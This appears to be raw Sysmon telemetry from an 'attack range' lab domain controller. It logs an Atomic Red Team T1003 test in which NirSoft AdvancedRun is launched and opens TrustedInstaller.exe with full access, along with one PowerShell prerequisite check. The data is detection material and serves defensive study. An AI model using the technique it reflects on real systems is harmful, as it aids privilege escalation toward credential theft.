734700x80000000000000003949333Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949332Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949331Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949330Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949329Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949328Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949327Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949326Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949325Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949324Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949323Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949322Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949321Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949320Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949319Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949318Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949317Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949316Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949315Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949314Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949313Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949312Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949311Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003949310Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003949309Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003949308Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003948525Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:26:53.426{834264DD-ECDD-61EA-5D03-000000002702}1076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003944033Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003944032Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003944031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003944030Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 534500x80000000000000003944029Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003944028Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944027Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+